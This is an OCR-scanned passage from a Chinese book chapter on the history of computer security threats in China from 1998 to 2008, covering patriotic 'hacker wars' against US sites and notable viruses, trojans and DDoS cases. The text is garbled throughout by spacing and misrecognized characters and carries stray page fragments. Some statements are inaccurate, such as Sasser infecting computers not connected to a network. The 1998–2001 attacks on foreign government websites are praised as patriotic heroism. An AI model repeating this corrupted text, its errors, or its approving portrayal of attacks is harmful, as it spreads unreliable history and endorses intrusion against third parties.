如 果 不 是 印尼 排 华 事件 的 发 生 , 也 许 中 国 黑 客 还 会 继续 沉默 下 去 。1998 年 5 月 , 印 
尼 排 华 事件 震惊 全 球 。 刚 刚 学 会 踏 咒 走 步 的 中 国 黑客 们 也 打响 了 他 们 自己 的 战争 ,这 也 
被 称 为 “第 一 次 网 络 卫 国 >。 一 个 名 为 “绿色 兵团 ”的 黑客 组 织 渐渐 浮 出 水 面 。“ 绿 色 兵 
团 ” 是 中 国 黑客 团体 的 先驱 ,1997 年 创立 ,2001 年 解散 。 虽 然 只 有 短 短 几 年 ,但 “绿色 兵 
团 ” 已 经 成 为 中 国 黑 客 社会 乃至 日 益 繁荣 的 信息 安全 社会 的 信仰 支柱 。 中 国 当代 的 资深 
黑客 , 追 本 溯源 ,无 论 任何 团队 , 皆 出 自 “ 绿 色 兵 团 ”"。“ 绿 色 兵 团 ” 也 是 中 国 第 一 个 真正 意 
义 上 的 黑客 组 织 。 在 这 次 事件 中 中 国 的 黑客 第 一 次 出 现在 公众 视野 里 , 携 着 爱国 义举 一 
呼 百 应 ,震动 了 那 一 代 青 年 人 。 在 此 之 后 各 种 黑客 组 织 或 个 人 层出不穷 ,甚至 出 现 了 “中 
国 黑 客 紧 急 会 议 中 心 ”, 负 责 对 外 国 网 站 攻击 期 间 的 协调 工作 。 

1999 年 ,出 现 了 首 个 混合 型 病毒 “美丽 杀手 /Melissa”。 这 种 病毒 专门 针对 微软 电子 
邮件 服务 器 MS Exchange 和 电子 邮件 Outlook ,利用 Outlook 全 域 地 址 表 来 获取 信箱 地 
址 信息 ,并 自动 给 表 中 前 50 个 信箱 发 送 电子 邮件 ,同时 在 其 后 附加 一 个 被 感染 的 文件 。 
在 被 这 个 病毒 感染 的 电脑 上 ,该 病毒 都 会 产生 同样 的 动作 ,在 短 时 间 内 产生 大 量 的 电子 
邮件 垃圾 ,呈现 几何 级 数 增长 。 据 计算 ,如 果 ”* 美 丽 杀手 病毒 能 够 按照 理论 上 的 速度 传 
播 ,只 需要 繁殖 5 次 就 可 以 让 全 世界 所 有 的 网 络 用户 都 收 到 一 份 。 据 外 电报 道 , 在 北约 
对 南 联 盟 发 动 的 战争 行动 中 ,证 实 * 美 丽 杀手 "病毒 使 5 万 部 电脑 主机 和 几 十 万 部 电脑 陷 
于 瘫痪 而 无 法 工作 ,网 络 被 空 数据 包 阻塞 ,迫使 许多 用 户 关机 避 灾 。 

同样 是 在 1999 年 ,国人 开发 的 首 款 木马 “冰河 ”诞生 了 。 在 设计 之 初 ,开发 者 的 本 意 
是 编写 一 个 功能 强大 的 远程 控制 软件 。 但 一 经 推出 ,就 依靠 其 强大 的 功能 成 为 了 黑客 们 
发 动人 侵 的 工具 ,并 结束 了 国外 木马 一 统 天 下 的 局 面 , 跟 后 来 的 灰 铝 子 等 成 为 国产 木马 
的 标志 和 代名词 。 在 2006 年 之 前 光 冰 河 " 在 国内 一 直 是 不 可 动摇 的 领军 木马 ,在 国内 没 
用 过 “冰河 ”的 人 等 于 没 用 过 木马 ,由 此 可 见 “ 冰 河 ” 木 马 在 国内 的 影响 力 之 巨大 。“ 冰 河 ” 
的 服务 器 端 程序 为 G-server. exe; 客 户 端 程序 为 G-client. exe; 上 默认 连接 端口 为 7626。 一 
日 运行 G-server, 那 么 该 程序 就 会 在 C:/Windows/system 目录 下 生成 Kernel32. exe 和 
sysexplr. exe, 并 删除 自身 。Kernel32. exe 在 系统 启动 时 自动 加 载运 行 ,sysexplr. exe 和 
TXT 文件 关联 。 即 使 你 删除 了 Kernel32. exe, 只 要 你 打开 TXT 文件 ,sysexplr. exe 就 会 
被 激活 , 它 将 再 次 生成 Kernel32. exe, 以 此 循环 往复 。“ 冰 河 ” 具 体 功 能 包括 : 自动 跟踪 目 
标 机 屏幕 变化 ,同时 可 以 完全 模拟 键盘 及 鼠标 输入 , 即 在 同步 被 控 端 屏幕 变化 的 同时 , 监 
控 端 的 一 切 键盘 及 鼠标 操作 将 反映 在 被 控 端 屏幕 ;记录 各 种 口令 信息 ,包括 开机 口令 、 屏 
保 口 令 、 各 种 共享 资源 口令 及 绝 大 多 数 在 对 话 框 中 出 现 过 的 口令 信息 , 且 1.2 以 上 的 版 
本 中 允许 用 户 对 该 功能 自行 扩充 ,2.0 以 上 版 本 还 同时 提供 了 击 键 记录 功能 ;获取 系统 信 
息 ,包括 计算 机 名 ` 注 册 公司 .当前 用 户 、 系 统 路 径 .操作 系统 版 本 .当前 显示 分 辩 率 、 物 理 
及 逻辑 磁盘 信息 等 多 项 系统 数据 ;限制 系统 ,包括 远程 关机 、 远 程 重 启 计算 机 、 锁 定 鼠 标 、 
锁定 系统 热 键 及 锁定 注册 表 等 多 项 功能 限制 ;远程 文件 ,包括 创建 .上传 下载、 复制、 删 
除 文件 或 目录 .文件 压缩 ,快速 浏览 文本 文件 .远程 打开 文件 (提供 了 4 种 不 同 的 打开 方 
式 一 一 正常 方式 .最 大 化 、 最 小 化 和 隐藏 方式 ) 等 多 项 文件 操作 功能 ;注册 表 , 包 括 对 主键 
的 浏览 增删、 复制 . 重 命名 和 对 键 值 的 读 写 等 所 有 注册 表 操作 功能 ;发 送信 息 , 以 4 种 常 
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用 图 标 向 被 控 端 发 送 简 短信 息 ; 点 对 点 通信 ,以 聊天 室 形式 同 被 控 端 进行 在 线 交 谈 。 

1999 年 ,还 发 生 了 第 一 次 “中 美 黑客 大 战 ”, 起 因 是 1999 年 的 “五 八 事件 ”。“ 五 八 事 
件 " 令 中 国 上 下 一 片 愤 怒 , 黑 客 们 自然 不 会 袖手旁观 ,他 们 袭击 了 美国 能 源 部 、 内 政 部 及 
其 所 属 的 美国 国家 公园 管理 处 的 网 址 ,这 一 次 大 规模 的 攻击 致使 白宫 网 址 三 天 失灵 。 中 
国 黑客 侵袭 事件 成 了 当时 美国 各 大 报纸 的 头条 新 闻 。 

与 此 同时 ,1999 年 出 现 了 一 种 破坏 性 病毒 ExploreZip。 据 统计 ,ExploreZip 从 
出 现 到 统计 时 的 几 个 月 内 , 它 所 造成 的 损失 几乎 是 1998 年 上 半年 所 有 电脑 病毒 所 造成 
损失 的 5 倍 还 多 。 它 也 利用 Outlook 地 址 筹 传 播 , 这 种 病毒 还 具有 通过 重 写 Office 文档 
来 删除 文档 的 恶意 功能 。 类 似 的 还 有 Happy99 病毒 。 这 些 病毒 都 开始 利用 互联 网 进行 
大 范围 ,大 规模 的 传播 ,病毒 在 极 短 的 时 间 内 就 能 遍布 全 球 ,这 标志 着 互联 网 病毒 成 为 病 
毒 新 的 增长 点 。 

这 个 阶段 我 们 称 之 为 “安全 威胁 迅速 萌芽 阶段 *。 最 初 的 计算 机 病毒 或 木马 大 都 具 
备 一 个 特征 , 即 都 是 由 个 人 尤其 是 学 生 编写 。 我 们 上 述 所 说 的 计算 机 病毒 或 者 木马 大 多 
数 都 是 一 些 学 习 或 从 事 电 脑 工 作 的 工程 师 或 程序 员 的 作品 。 不 仅 计算 机 病毒 或 木马 的 
编写 者 是 “单独 作战 ”而 且 他 们 的 目的 实际 上 都 很 简单 ,有 些 是 突 发 奇想 ,有 些 是 为 了 检 
验 所 学 知识 ,有 些 则 是 炫 炊 技术。 

在 这 个 阶段 ,大 多 数 计算 机 病毒 与 木马 感染 的 都 是 个 人 电脑 或 局 域 网 里 的 计算 机 。 
出 现 这 个 现象 的 原因 是 当时 计算 机 与 互联 网 在 全 世界 尤其 是 中 国都 还 只 是 刚 兴 起 的 新 
鲜 事物 。 在 2000 年 以 前 ,互联 网 在 中 国都 没有 得 到 大 范围 的 普及 ,因此 以 计算 机 普及 应 
用 为 依托 的 计算 机 病毒 与 木马 所 赖 以 生存 的 环境 相对 单一 ,主要 是 个 人 普通 电脑 ,或 者 
为 数 不 多 的 存在 于 局 域 网 中 的 电脑 。 

在 这 个 阶段 的 早期 ,大 多 数 计算 机 病毒 都 是 利用 软盘 的 启动 原理 ,通过 修改 系统 启 
动 扇 区 和 磁盘 读 写 中 断 来 影响 电脑 的 工作 效率 , 且 大 多 数 是 被 包含 在 通过 硬件 介质 进行 
传播 的 范畴 内 。 直 到 1999 年 出 现 的 电脑 病毒 打破 了 这 种 局 面 ,通过 互联 网 传播 的 病毒 
开始 出 现在 人 们 的 视野 里 。 相 比 之 下 ,当时 的 木马 通过 互联 网 传播 的 案例 相对 较 少 。 

与 之 后 的 网 络 安全 威胁 相 比 ,这 个 阶段 的 计算 机 病毒 与 木马 所 造成 的 影响 总 体 不 是 
很 大 。 由 于 是 个 人 编写 ,计算 机 病毒 结构 相对 简单 ,所 产生 的 安全 威胁 规模 都 很 小 ,相对 
来 说 较为 容易 应 对 与 清除 。 大 多 数 病 毒 或 木马 都 未 经 过 互联 网 传播 ,波及 范围 有 限 , 主 
要 都 是 在 单机 或 局 域 网 范围 内 造成 影响 。 即 使 有 些 病毒 通过 互联 网 传播 ,但 发 作 条 件 较 
多 , 且 也 难以 在 不 同 环境 下 产生 恶性 效果 。 


182 安全 威胁 快速 发 展 阶 段 (2000 一 2007 年 ) 


2000 年 5 月 4 日 ,一 种 名 为 "我 爱 你 "的 电脑 病毒 开始 在 全 球 各 地 迅速 传播 。 这 个 病 
毒 是 通过 Microsoft Outlook 电子 邮件 系统 传播 的 ,邮件 的 主题 为 ILOVE YOU ,并 包含 
一 个 附件 。 一 旦 在 Microsoft Outlook 里 打开 这 个 邮件 ,系统 就 会 自动 复制 并 向 地 址 簿 中 
的 所 有 邮件 地 址 发 送 这 个 病毒 。 据 称 :“ 爱 虫 " 病 毒 是 迄今 为 止 发 现 的 传染 速度 最 快 而 且 
传染 面积 最 广 的 计算 机 病毒 , 它 已 对 全 球 包 括 股票 经 纪 、 食 品 、 媒 体 、 汽 车 和 技术 公司 以 
及 大 学 甚至 医院 在 内 的 众多 机 构造 成 了 负面 影响 。 
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2000 年 8 月 “自由 破解 /liberty crack” 木 马 出 现 。 这 不 仅 是 首 支 运行 于 Palm 作业 
系统 的 木马 ,在 用 户 不 备 时 还 能 通过 红外 线 资料 交换 或 电子 邮件 进行 传播 。 

2001 年 5 月 ,发 生 了 中 国有 史 以 来 规模 最 大 、 影 响 最 深远 的 黑客 大 战 ,这 是 一 场 震 惊 
全 球 的 网 络 战争 。 起 因 是 由 于 中 美 撞击 事件 , 撞 机 事件 发 生 之 后 ,群情 激愤 ,全 国人 民 一 
片 愤 慨 。 当 撞 机 事件 的 谈判 仍 处 在 还 机 与 不 还 机 的 谈判 当中 ,而 互联 网 上 的 斗争 却 已 然 
火热 。 一 场 大 规模 、 大 范围 的 黑客 战争 ,逾越 浩渺 的 太平 洋 ,在 网 络 上 展开 。 据 称 大 约 有 
八 万 名 中 国 黑客 参与 了 此 次 网 络 反击 , 受 损 的 主要 是 商业 网 站 , 即 以 . com 作 后 级 的 网 
站 。 政 府 . gov 和 机 构 . org 相对 较 少 ,教育 部 门 . edu 并 未 触及 。 

2001 年 夏天 ,出 现 了 专门 感染 服务 器 的 蠕虫 病毒 “红色 代码 ”。“ 红 色 代 码 ” 感 染 运 行 
Microsoft IIS Web 服务 器 的 计算 机 。 其 传播 所 使 用 的 技术 可 以 充分 体现 网 络 时 代 网 络 
安全 与 病毒 的 巧妙 结合 ,将 网 络 蠕虫 .计算 机 病毒 .木马 程序 合 为 一 体 , 开 创 了 网 络 病毒 
传播 的 新 路 ,可 称 之 为 划时代 的 病毒 。 如 果 稍 加 改造 ,将 是 非常 致命 的 病毒 ,可 以 完全 取 
得 所 攻破 计算 机 的 所 有 权限 并 为 所 和 欲 为 ,可 以 盗 走 机 密 数 据 ,严重 威胁 网 络 安全 。 

2001 年 9 月 18 日 必 尼 姆 达 /Nimda" 病 毒 开 始 在 全 球 草 延 。“ 尼 姆 达 /Nimda" 是 传播 
性 非常 强 的 恶意 病毒 。 以 邮件 .主动 攻击 服务 器 .即时 通信 工具 传播 .FTP 协议 传播 、 网 
页 浏览 传播 ,能 够 通过 多 种 传播 渠道 进行 传染 。 对 于 个 人 用 户 的 PC,“ 尼 姆 达 /Nimda” 可 
以 通过 邮件 .网 上 即时 通信 工具 和 “FTP 程序 ”同时 进行 传染 ;对 于 服务 器 ,“ 尼 姆 达 / 
Nimda” 则 采用 和 “红色 代码 ”病毒 相似 的 途径 , 即 攻击 微软 服务 器 程序 的 漏洞 进行 传播 。 
由 于 该 病毒 在 自身 传染 的 过 程 中 占用 大 量 的 网 络 带宽 和 计算 机 的 内 部 资源 ,因此 许多 企 
业 的 网 络 受 到 很 大 的 影响 ,其 至 瘫痪 ,PC 速度 也 会 有 明显 的 下 降 。 

2001 年 还 出 现 了 * 灰 鸽子 木马“ 灰 铝 子 ” 又 是 国产 木马 的 一 个 典型 案例 。 它 采用 
Delphi 编写 ,最 早 是 以 源码 共享 的 方式 出 现 于 互联 网 ,至 今 这 些 源 码 仍 可 以 找到 。 原 本 
该 软件 适用 于 公司 和 家 庭 管理 ,但 因 早年 软件 设计 缺陷 ,被 黑客 恶意 使 用 ,曾经 被 误 认为 
是 一 款 集 多 种 控制 方式 于 一 体 的 木马 程序 .“ 灰 铝 子 ”本身 所 具备 的 键盘 记录 、 屏 幕 捕 
捉 .文件 上 传 下 载 和 和 运行、 摄像 头 控制 等 功能 ,将 使 用 户 没 任何 隐私 可 言 , 更 可 怕 的 是 服 
务 端 高 度 隐 藏 自 己 ,使 受害 者 无 从 得 知 感 染 此 病毒 。 

同样 是 在 2001 年 ,“ 广 外 女生 ”和 “ 广 外 男生 ”两 款 木 马 十 分 引 人 注 目 。 这 两 者 都 是 
广东 外 语 外 贸 大 学 网 络 小 组 的 作品 。“ 广 外 女生 ”木马 程序 运行 后 ,将 会 在 系统 的 System 
目录 下 生成 一 份 自己 的 复制 ,名 称 为 Diagcfg. exe, 并 关联 EXE 文件 的 打开 方式 ,如 果 贸 
然 删 掉 该 文件 ,将 会 导致 系统 所 有 EXE 文件 无 法 打开 的 问题 。“ 广 外 男生 ”木马 的 客户 
端 模仿 Windows 资源 管理 器 ,除了 全 面 支持 访问 远程 服务 器 文件 系统 ,也 同时 支持 通过 
对 方 的 “网 上 邻居 ”, 访 问 对 方 内 部 网 其 他 计算 机 。 

2002 年 1 月 17 日 ,主要 针对 微软 Outlook Express 用 户 的 “求职 信 ” 病 毒 在 网 上 滋生 
草 延 。 该 病毒 是 典型 的 混合 式 病毒 ,不仅 拥 有 普通 病毒 感染 电脑 文件 和 档案 的 特点 ,也 
拥有 蠕虫 和 木马 的 功能 。 此 病毒 会 向 外 发 送 带 毒 邮 件 ,发 作 后 会 感染 电脑 中 的 . doc 和 
. xls, 病 毒 会 自动 终止 反 病毒 软件 (杀毒 软件 ) 的 运行 ,并 将 其 从 电脑 中 删除 ,其 危害 程度 
比较 严重 。 同 年 ,国内 也 出 现 了 第 一 支 中 文 混合 型 病毒 ,被 感染 的 电脑 屏幕 上 会 显示 “ 附 
件 在 哪儿 啊 ? 你 找 得 到 我 吗 ? 放心 打开 来 ,这 是 一 个 重要 文件 ,可 以 查 杀 QQ 病毒 的 专 


34 


Mi:s 


杀 工 具 请 查收 附件 .” 这 种 病毒 能 窃取 电脑 中 各 种 密码 ,范围 涵盖 操作 系统 、 网 络 游戏 . 电 
子 邮件 等 。 

2003 年 6 月 19 日 “大 无 极 " 病 毒 被 截获 。 该 病毒 的 主要 危害 是 乱 发 邮件 ,邮件 内 容 
的 一 部 分 来 自 被 感染 机 器 中 的 资料 ,因此 有 可 能 泄露 用 户 的 机 密 文 件 , 特 别 是 对 利用 局 
域 网 办 公 的 企 事 业 单 位 。 

2003 年 8 月 11 日 冲击波? 病毒 在 网 上 草 延 开 来 。 病 毒 运行 时 会 不 停 地 利用 IP 扫 
描 技术 寻找 网 络 上 系统 为 Windows 2000 或 Windows XP 的 计算 机 ,找到 后 就 利用 
DCOM/RPC 缓冲 区 漏洞 攻击 该 系统 ,一 旦 攻击 成 功 ,病毒 体 将 会 被 传送 到 对 方 计算 机 中 
进行 感染 ,使 系统 操作 异常 .不 停 重 启 ,甚至 导致 系统 奔 溃 。 

2004 年 1 月 ,在 网 上 出 现 了 “悲惨 命运 /MyDoom” 病 毒 。 当 用 户 打 开 并 运行 附件 内 
的 病毒 程序 后 ,病毒 就 会 以 用 户 信箱 内 的 电子 邮件 地 址 为 目标 ,伪造 邮件 的 源 地 址 ,向 外 
发 送 大 量 带 有 病毒 附件 的 电子 邮件 ,同时 在 用 户主 机 上 留 下 可 以 上 载 并 执行 任意 代码 的 
后 门 。 

同年 光 震 功 波 /Sasser” 和 “网络 天 空 /NetSky” 也 在 网 上 肆虐 。 它 们 都 出 自 17 岁 的 德 
国 少年 Sven Jachan 之 手 .“ 震 荡 波 /Sasser" 是 一 款 能 够 进行 自我 复制 的 互联 网 蠕虫 病 
毒 , 即 使 不 联网 的 电脑 也 能 够 感染 。 它 不 通过 电子 邮件 传播 ,而 是 直接 通过 互联 网 感染 
电脑 。 病 毒 感染 计算 机 后 ,会 自动 寻找 有 漏洞 的 系统 ,并 引导 计算 机 下 载 病毒 文件 和 执 
行 ,整个 过 程 都 是 自动 完成 , 且 无 法 正常 关机 ,只 能 强行 关闭 .“ 网 络 天 空 /NetSky” 利 用 
电子 邮件 和 共享 目录 传播 ,传播 的 速度 极 快 。 病 毒 利用 自 带 的 SMTP 邮件 引擎 对 外 发 送 
邮件 ,邮件 发 送 人 随机 产生 ,标题 可 能 为 hello、stolen、warning、unknown,fake, 附 件 后 级 
为 .scr com、. pif、. rtf、. doc、. htm,. exe 等 ,附件 即 是 病毒 体 。 通过 邮件 传播 ,使 用 
UPX 压缩 。 运 行 后 ,在 Windows 目录 下 生成 自身 复制 名 为 Winlogon，exe。 病 毒 使 用 
Word 的 图 标 , 并 在 共享 文件 夹 中 生成 自身 复制 。 病 毒 创 建 注册 表 项 ,使 得 自身 能 够 在 系 
统 启动 时 自动 运行 。 病 毒 邮件 的 发 信人 ,主题 .内 容 和 附件 都 不 固定 。 

此 后 ,又 出 现 了 国人 编写 的 “五 毒 虫 "病毒 。“ 五 毒 虫 "病毒 综合 7 了 “冲击波”“QQ 小 
尾巴 ”、“ 悲 惨 命 运 /MyDoom”、“ 恶 座 ”“ 木 马 ” 等 众多 病毒 危害 于 一 身 ,将 对 电脑 用 户 造 
成 严重 危害 。 中 毒 后 的 计算 机 可 能 会 出 现 如 下 的 所 有 或 任意 一 种 现象 : 向 外 疯狂 发 送 垃 
圾 邮件 、60 秒 倒计时 重启 .向 QQ 好 友 发 送 垃圾 信息 、 打 不 开 杀 毒 软件 .向 网 络 内 其 他 机 
器 攻击 、 上 网 速度 缓慢 等 。 

也 是 在 2004 年 网银 大 盗 ? 木 马 造 成 了 一 系列 安全 威胁 “网银 大 次 ?运行 时 ,用 户 
登录 网 银 新 登录 页 面 时 ,木马 会 将 页 面 转换 成 安全 性 能 较 差 但 依然 能 够 运转 的 旧版 页 
面 , 然 后 记录 用 户 的 卡号 和 密码 。 之 后 出 现 的 新 版 本 还 可 以 利用 招行 网 银 专业 版 的 备份 
安全 证 书 功能 , 盗 取 安 全 证 书 , 或 者 采用 API Hook 等 技术 干扰 网 银 登 录 安 全 控件 的 
运行 。 

2005 年 1 月 21 日 晚 ,中 国 出 现 了 首 例 DDoS 网 络 攻 击 。8848 网 络 技术 有 限 公 司 首 
页 招 到 DDoS 攻击 , 几 千 万 个 来 自 百度 搜索 联盟 成 员 的 IP 地 址 在 短 时 间 之 内 同时 访问 
8848 首页 ,导致 8848 网 络 技术 有 限 公司 下 属 的 8848. net 和 8848. com 等 域名 突然 无 法 
访问 。 
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2005 年 出 现 了 Mytob 病毒 。Mytob 是 一 种 邮件 蠕虫 ,类 似 于 “悲惨 命运 /MyDoom” 
病毒 ,利用 IRC 控制 后 门 。 该 病毒 主要 通过 大 量 电子 邮件 传播 ,创建 僵尸 网 络 。 借 此 发 
送 垃圾 信息 .安装 间谍 的 软件 或 发 动 钓鱼 攻击 。 

同样 是 在 2005 年 ,出 现 了 一 类 新 的 木马 ,名 为 即时 通信 木马 。 主 要 有 三 种 类 型 : 一 
是 发 送 消息 型 。 通 过 即时 通信 软件 发 送 含 有 恶意 网 址 的 消息 ,让 用 户 点 击 , 中 毒 后 又 会 
向 其 他 好 友 发 送 病 毒 消息 。 如 “武汉 男生 2005” 木 马 ,通过 MSN QQ 等 聊天 工具 盗 取 
“传奇 ”游戏 的 账号 和 密码 。 二 是 网 络 游 戏 盗号 型 。 这 这 类 木马 最 大 特点 是 通过 
ShellExecuteHooks 启动 , 盗 取 魔 兽 、 梦 幻 西游 等 网 络 游戏 的 账号 进行 买卖 获得 利益 。 三 
是 自我 传播 型 。 这 类 木马 有 “MSN 性 感 鸡 “QQ 爱 虫 ” 等, 基本 都 是 搜寻 到 聊天 窗口 后 
对 其 进行 控制 ,群发 文件 或 消息 。 

2006 年 ,一 款 叫 “风暴 蠕虫 ”的 病毒 开始 肆虐 。 该 病毒 运行 时 ,会 出 现 一 封 标题 为 “ 风 
暴 袭 击 欧洲 ,230 人 死亡 ”的 邮件 。 这 种 病毒 的 变种 很 多 ,有 的 会 把 电脑 变 成 僵尸 或 “ 肉 
鸡 ”; 有 的 制造 僵尸 网 络 , 在 互联 网 上 发 送 垃圾 邮件 。 

同样 是 在 2006 年 ,针对 苹果 电脑 的 Leap-A/Oompa-A 病毒 出 现 。 它 利用 iChat 聊 
天 程序 在 苹果 电脑 之 间 进 行 传播 。 当 病毒 感染 苹果 电脑 后 , 它 会 自动 搜索 iChat 的 联系 
人 列表 并 向 其 中 的 好 友 发 送信 息 ,信息 中 附带 一 个 看 起 来 像 是 不 完整 的 jpeg 图 像 的 损坏 
附件 。 

2006 年 ,国内 DDoS 攻击 愈演愈烈 ,针对 一 些 知名 中 小 企业 的 攻击 数量 不 断 增加 。 
如 5 月 份 ,江苏 省 扬州 某 公司 宣布 持续 两 年 遭 到 DDoS 攻击 ,尤其 是 最 近 一 次 攻击 使 该 公 
司 整个 网 络 运营 业务 完全 中 断 、 损 失 严重 。12 月 15 日 ,辽宁 锦州 某 运 营 商 遭 DDoS 攻 
击 , 来 自 陕西 省 的 两 个 IP 地 址 发 送 大 量 数据 包 到 辽宁 锦州 的 路 由 器 。12 月 20 日 ,全 亚 
洲 最 大 的 机 房 一 一 网 通 亦 庄 机 房 遭 到 黑客 攻击 ,攻击 流量 最 高 时 达到 了 12G 流量 , 远 远 
超过 了 网 通 亦 庄 机 房 7G 的 带宽 。 

2007 年 1 月 初 “ 能 猫 烧 香 ”病毒 开始 肆虐 网 络 , 它 是 国产 病毒 中 颇具 名 气 的 一 吉 
“熊猫 烧香 ”其 实 是 一 种 蠕虫 病毒 的 变种 ,而 且 是 经 过 多 次 变种 而 来 的 ,由 于 中 毒 电 脑 的 
可 执行 文件 会 出 现 “ 能 猫 烧 香 ” 图 案 , 所 以 也 被 称 为 “能 猫 烧香 ”病毒 。 但 原 病 毒 只 会 对 
EXE 图 标 进行 替换 ,并 不 会 对 系统 本 身 进行 破坏 。 而 大 多 数 该 病毒 的 变种 是 中 等 病毒 变 
种 ,用 户 电脑 中 毒 后 可 能 会 出 现 蓝 屏 ,频繁 重启 以 及 系统 硬盘 中 数据 文件 被 破坏 等 现象 。 
同时 ,该 病毒 的 某 些 变 种 可 以 通过 局 域 网 进行 传播 ,进而 感染 局 域 网 内 所 有 计算 机 系统 ， 
最 终 导致 企业 局 域 网 瘫痪 ,无 法 正常 使 用 , 它 能 感染 系统 中 . exe、. com、. pif、. src 
. html、. asp 等 文件 , 它 还 能 终止 大 量 的 反 病毒 软件 进程 并 且 会 删除 扩展 名 为 gho 的 备份 
文件 。 被 感染 的 用 户 系统 中 所 有 . exe 可 执行 文件 全 部 被 改 成 熊猫 举 着 三 根 香 的 模样 。 

2007 年 4 月 还 出 现 了 名 为 “ 艾 妮 ”的 病毒 。 该 病毒 集 熊 猫 烧 香 、 维 金 两 大 病毒 的 特点 
于 一 身 ,是 一 个 传播 性 与 破坏 性 极 强 的 蠕虫 , 它 会 疯狂 感染 用 户 电 脑 中 的 . exe 文件 ,下 载 
其 他 木马 和 病毒 程序 ,病毒 通过 局 域 网 传播 可 能 导致 内 网 大 面积 瘫痪 。 更 为 严重 的 是 ， 
利用 微软 动画 光标 (ANDI) 漏 洞 传播 ,使 得 包括 在 安全 性 上 敏 费 苦心 的 Vista 系统 也 无 法 
幸免 ,用 户 只 要 浏览 带 有 恶意 代码 的 Web 网 页 或 电子 邮件 将 立刻 感染 该 病毒 。 

2007 年 还 沿袭 了 之 前 木马 的 发 展 趋势 ,出 现 了 ”魔兽 ?木马 和 "征途 ?木马 。 这 类 木马 
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都 是 盗 取 网 络 游戏 的 账号 和 密码 ,感染 木马 后 , 它 会 把 自己 复制 到 Windows 下 并 添加 注 
册 表 启动 项 ,如 果 发 现 登 录 游 戏 的 用 户 , 便 通 过 钩子 读 取 用 户 输入 的 账号 和 密码 ,并 将 其 
发 回程 序 编写 者 的 邮箱 。 

2007 年 7 月 25 日 ,联众 公司 向 公安 局 报案 , 称 某 科技 公司 专门 雇用 黑客 对 其 托管 在 
北京 .上 海 .石家庄 等 地 的 多 台 网 络 游戏 服务 器 进行 长 达 1 个 月 的 DDoS 攻击 ,造成 电脑 
服务 器 瘫痪 并 被 迫 停止 服务 ,损失 达 上 百 万 元 。 经 查 , 有 4 名 犯罪 嫌疑 人 使 用 了 TCP 
Flood 的 DDoS 攻击 手段 对 联众 公司 进行 了 攻击 。 这 也 是 我 国 首 例 侦破 的 DDoS 攻 
击 案 。 

在 这 个 阶段 ,互联 网 安全 威胁 快速 增加 ,病毒 .木马 的 种 类 急剧 增多 ,攻击 手段 趋向 
多 元 化 ,因此 我 们 称 之 为 “安全 威胁 快速 发 展 阶段 *。 在 这 个 阶段 后 门 的 数量 经 历 了 一 个 
由 多 变 少 的 过 程 ,比较 常见 的 后 门 有 网 页 后 门 、 线 程 插入 后 门 、 扩 展 后 门 .C/S 后 门 等 。 
僵尸 网 络 的 规模 也 越发 庞大 , 据 调查 ,2005 年 4 月 和 5 月 间 , 全 球 每 天 约 有 15 万 一 17 万 
新 僵尸 程序 出 现 ,其 中 中 国 占 15%~~20%。 并 且 新 的 僵尸 程序 功能 越 来 越 强 大 ,隐蔽 性 
也 越 来 越 高 ,已 经 成 为 最 令 人 生 旦 的 安全 威胁 之 一 。 漏 洞 同样 也 是 信息 安全 的 主要 威胁 
之 一 ,对 用 户 产生 较 大 影响 的 漏洞 包括 “伪造 TCP 包 可 导致 拒绝 服务 漏洞 >"“ 处 理 伪 造 
IP 选项 存在 的 漏洞 "“Microsoft Windows 动态 游标 文件 头 栈 溢出 漏洞 "等 。 分 布 式 拒绝 
服务 攻击 在 这 个 阶段 中 也 成 为 黑客 惯用 伎俩 。 据 统计 ,在 这 个 阶段 中 中 国 已 成 为 分 布 式 
拒绝 服务 攻击 的 主要 目标 ,大 概 占 到 63%。 随 着 计算 机 与 网 络 的 普及 、 网 民 数 量 爆炸 性 
的 增长 , 流 谍 软件 与 间谍 软件 的 增长 势头 也 更 为 迅猛 。 例 如 ,2005 年 中 国有 将 近 90% 的 
用 户 遭 受 间 谍 软 件 的 袭击 , 比 起 2004 年 的 30% 提 高 了 六 成 。2000 年 后 ,计算 机 病毒 、 木 
马 以 及 后 门 程序 ,间谍 软件 等 安全 威胁 的 编写 主体 也 开始 发 生变 化 ,由 个 人 变 为 团体 ,并 
逐渐 发 展 成 黑客 产业 链 。 在 黑客 产业 链 中 ,各 个 团体 “各 司 其 职 ": 有 专门 开发 病毒 的 团 
体 ; 有 专门 发 掘 漏洞 的 团体 ;有 专门 贩卖 病毒 ,漏洞 的 团体 ;有 专门 负责 攻击 、 窃 取信 息 的 
团体 ;有 专门 出 售 信息 的 团体 ;有 专门 负责 套现 洗钱 的 团体 ;有 专门 负责 黑客 培训 的 团 
体 。 虽 然 黑客 团体 存在 的 目的 是 多 样 的 ,但 最 主要 的 是 谋取 经 济 利益 。 据 有 关 部 门 估 
计 , 在 这 个 阶段 黑客 产业 链 年 产值 已 超过 10 亿 人 民 币 。 本 阶段 的 计算 机 病毒 已 开始 突 
破 对 单机 功能 的 破坏 ,与 上 一 阶段 的 仅 限 于 单机 或 局 域 网 不 同 , 此 阶段 则 是 将 范围 扩大 
至 对 服务 器 .端口 等 计算 机 设备 和 网 络 设备 进行 攻击 。 由 于 互联 网 的 广泛 普及 和 应 用 ， 
这 一 阶段 的 安全 威胁 传播 速度 很 快 ,几乎 每 一 类 大 型 的 病毒 或 木马 ,都 能 在 全 球 范围 广 
泛 传 播 ,所 造成 的 信息 失窃 与 经 济 损失 也 越 来 越 严重 。 威 胁 的 手段 也 日 趋 复杂 与 隐蔽 ， 
增加 了 应 对 的 难度 。 


183 安全 威胁 深度 融合 阶段 2008 年 至 今 ) 


2008 年 以 来 ,传统 恶意 代码 依然 大 量 存在 但 影响 力 减弱 ,而 僵尸 网 络 、 间 谍 软 件 、 网 
络 钓鱼 等 网 络 安 全 事件 较 以 往 均 有 明显 增加 。 安 全 威胁 在 多 种 平台 上 不 断 泛 化 且 分 布 
越 来 越 广 ,各 种 安全 威胁 深度 融合 ,再 加 上 网 络 战 形态 初步 显现 ,都 使 得 网 络 安全 问题 变 
得 更 加 错综复杂 ,网 络 安全 防御 更 加 困难 。 

2008 年 出 现 了 一 种 名 为 *AV 终结 者 ”的 病毒 。 这 是 一 种 闪存 寄生 病毒 ,主要 以 非法 
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网 站 作为 传播 渠道 。 该 病毒 可 以 绑架 杀毒 软件 ,破坏 系统 安全 模式 ,并 且 格式 化 、 寻 
统 等 常规 修复 手段 全 部 失灵 ,隐藏 自身 ,破坏 系统 所 有 文件 选项 等 。 

